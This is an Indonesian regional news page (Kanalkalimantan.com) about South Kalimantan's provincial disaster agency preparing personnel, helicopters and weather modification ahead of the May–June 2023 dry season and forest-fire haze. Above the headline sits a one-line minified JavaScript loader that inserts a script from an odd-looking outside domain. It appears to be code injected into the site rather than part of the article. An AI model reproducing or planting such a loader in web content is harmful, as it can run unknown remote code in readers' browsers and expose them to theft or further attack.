(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Puncak Kemarau Mei-Juni, Kalsel Waspada Bencana Asap Karhutla


KANALKALIMANTAN.COM, BANJARMASIN – Meningkatnya suhu di beberapa kota di Indonesia saat ini tengah dirasakan masyarakat, terutama di Kalimantan Selatan (Kalsel).

Wilayah Kalsel menjadi salah satu provinsi yang akan memasuki puncak kemarau pada pertengahan Mei hingga awal Juni mendatang, sesuai dengan prakiraan Badan Meteorlogi, Klimatologi, dan Geofisika (BMKG).

Peningkatan suhu di sejumlah kota di Indonesia beberapa waktu terakhir, dijelaskan Badan Nasional Penanggulangan Bencana (BNPB) bakal berpotensi menimbulkan kebakaran hutan dan lahan (Karhutla).

Pihaknya pun tengah memfokuskan upaya antisipasi bencana potensi karhutla di 6 provinsi, Kalsel salah satunya yang secara historis tergolong sebagai kawasan rawan Karhutla.

Baca juga: Pendaftar Pertama Kursi DPD RI Dapil Kalsel, Habib Banua Mengincar Periode Ketiga

Badan Penanggulangan Bencana Daerah (BPBD) Kalsel telah melakukan koordinasi terkait kesiapan personel dan peralatan untuk menanggulangi bencana asap akibat Karhutla di wilayah Kalsel.

Wilayah Kalsel menjadi salah satu provinsi yang akan memasuki puncak kemarau pada pertengahan Mei hingga awal Juni mendatang. Foto: wanda

“Langkah awal kita akan melalukan survei lapangan khususnya dalam hal persiapan apel siaga nanti,” ujar Pelaksana Harian (Plh) Kalak BPBD Kalsel Bambang Dedi Mulyadi, Senin (1/5/2023).

Bersama dengan instansi dan lembaga terkait, TNI, Polri serta masyarakat, pihaknya pun akan melaksanakan apel kesiapan personel dan peralatan penanggulangan Karhutla Kalsel 2023.

“Apel akan digelar di Pondok Pesantren Darul Hijrah Putra Cindai Alus, Kecamatan Martapura Kabupaten Banjar 3 Mei 2023 mendatang,” ungkapnya.

Bambang mengatakan saat ini Pemprov Kalsel tengah menunggu bantuan helikopter seperti Heli patroli dan Heli Water Bombing dan operasi Teknik Modifikasi Cuaca (TMC).

Baca juga: Profil Andi Pangerang Hasanuddin, Peneliti BRIN Tersangka ‘Halal Darah Muhammadiyah’

“Kita menunggu BNPB menyiapkan dukungan Satgas Udara berupa penempatan satuan-satuan perangkat dan personel pada pertengahan Mei mendatang,” jelas Bambang.

Jika terindikasi terjadi karhutla, sambung Bambang maka Satgas Darat akan melakukan pengecekan di lapangan agar seandainya informasi tersebut benar, maka bisa dilakukan pemadaman sesegera mungkin sebelum api membesar.

“Pemadaman api di fase-fase awal ini bisa dilakukan oleh Satgas darat didukung juga Satgas Udara,” sambungnya.

Sesuai denga arahan Gubernur Kalsel juga mengundang kepada seluruh instansi dan lembaga terkait untuk bersinergi menuntaskan bencana musiman ini.

“Dan pesan gubernur juga mengharapkan bukan hanya pada apelnya, kita harus kolaborasi dengan siapa saja untuk pemantapan langkah-langkah di lapangan nantinya,” tutup Bambang. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Al Ghifari

Recent Posts

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

2 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

4 jam ago

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

7 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

8 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

11 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

12 jam ago

This website uses cookies.